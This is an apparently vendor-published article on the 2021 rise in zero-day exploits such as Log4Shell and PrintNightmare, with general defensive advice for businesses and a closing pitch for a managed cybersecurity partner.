Responding to Zero-Days in 2022

With the Covid-19 pandemic in 2020 forcing a lot of businesses to adopt a remote style of work – in turn opened a shopping window for cybercriminals to buy from, as they look for zero-day exploits as organizations try to protect themselves in uncharted territory. Zero-day attacks only continued to rise in 2021 as cybercriminals developed more sophisticated tools to exploit loopholes in systems, which saw twice as many zero-day attacks compared to 2020. Though this stat can be misleading because there were also advancements in cybersecurity, and it is entirely possible that more zero-day attacks were recorded because of better detection systems in place to combat it. So, with that logic in hand we can expect an increase into 2022 but it will be measured on the successes of these attacks rather than simply how many were recorded. 

What have we learned from 2021? 

One of the most prominent factors with zero-days was that any competent technical minded person with no prior hacking experience can obtain the tools and software needed to exploit vulnerabilities in systems. They do not have to have access to the dark web either, these tools became just a web browser search away, and anyone could get their hands on them. One contributing factor in the higher rate of reported zero-days is the rapid global proliferation of these hacking tools. Threat actors are all pouring heaps of investment into zero-days to use for themselves, and they are reaping the rewards. This is a scary thought that anyone could become a “hacker” overnight with tools designed to do all the work for them. At least 66 zero-days have been found in use this year, according to databases such as the 0-day tracking project, almost double the total for 2020, and more than in any other year on record. This is further backed up by Log4Shell exploit and PrintNightmare, which were the highlight of zero-day exploits in 2021 and continues to be a problem coming into 2022. 

Log4j is a java-based logging facility used by vendors and developers to address problems for users through a process called “logging” but also allows them to keep track of other applications and services – making it a huge library of activity that is essential for building software. The exploit term for Log4j is coined Log4Shell, and if left unfixed it allows cybercriminals to break into servers and systems where they can obtain: 

  • Passwords and credentials 
  • Steal and lock data away 
  • Infect networks with malicious software 
  • Cryptocurrency mining 
  • Distributed denial-of-service (DDoS) botnets 
  • Ransomware attacks 

With Log4j being used by millions of users, the attack surface is immeasurably large, and is something that could affect businesses well after an attack in the long-term due to the amount of damage that can be caused and with how easily the tools are available. 

How can you protect yourself in 2022? 

  • Patch updates: If you are a victim of a zero-day attack, it is important to keep track of patches and updates to protect or at least mitigate future attacks. If you are a software developer, then developing those patches asap, would be a priority. 
  • Identification and Response: Should you be attacked or compromised, measures should be in place to contain the attack, identify the root cause of the attack and the recovery period after the attack. 
  • User Education: Many zero-day attacks happen because of human error; it is important that employees and colleagues practice safe online housekeeping and report anything suspicious immediately. 
  • Preventative measures: Having updated and correctly configured firewalls in place, latest anti-virus or end point detection software, blocking access to certain sites, attachments, and emails, and making sure all patches are up to date. 
  • Vulnerability Management: The need for a comprehensive vulnerability management program is more than ever now. Regular scanning of assets and the prioritisation for the remediation of vulnerabilities by doing a risk-based approach has been found to be more effective. There are some great vulnerability management tools available, this allows you to focus on the full vulnerability management life cycle to ensure standards, including the monitoring of critical assets is maintained. 
  • Investing in a cybersecurity partner: Having a cybersecurity partner by your side allows you to focus on your business operations, while they have systems in place and advanced technology designed to deal with zero-day exploits. They are constantly monitoring patch updates as well as developing systems to better protect you. In the long term this could save your business from attacks that could have been detrimental. Cybersecurity partners provide customers with a managed service to take on full responsibility of the tools, that of which include vulnerability management to give the business peace of mind and allow them to focus on other important matters. 

Fortunately, due to the severity of zero-day attacks in 2021, just how cybercriminals have been advancing in their efforts to find exploits, so has the cybersecurity industry in detecting and making life difficult for attackers. More companies are equipped or investing in cybersecurity measures to fight back and protect themselves, and as time goes by and more attacks happen, so will the understanding of users. As much as cybersecurity has a focus on protection, many advances have happened from failure and learning from mistakes, and 2022 is here to amend those mistakes that happened in 2021. 

Furthermore, the fact that we found 66 zero-day vulnerabilities indicates that our defenses are improving, and we can detect even more complex hacks, more than before. This can be seen as a positive when looking ahead into 2022. 

Article Credit and Resource: Stewart Gilburt, Team Lead – Vulnerability Management for Nclose

Need to Mitigate a Cyber Risk?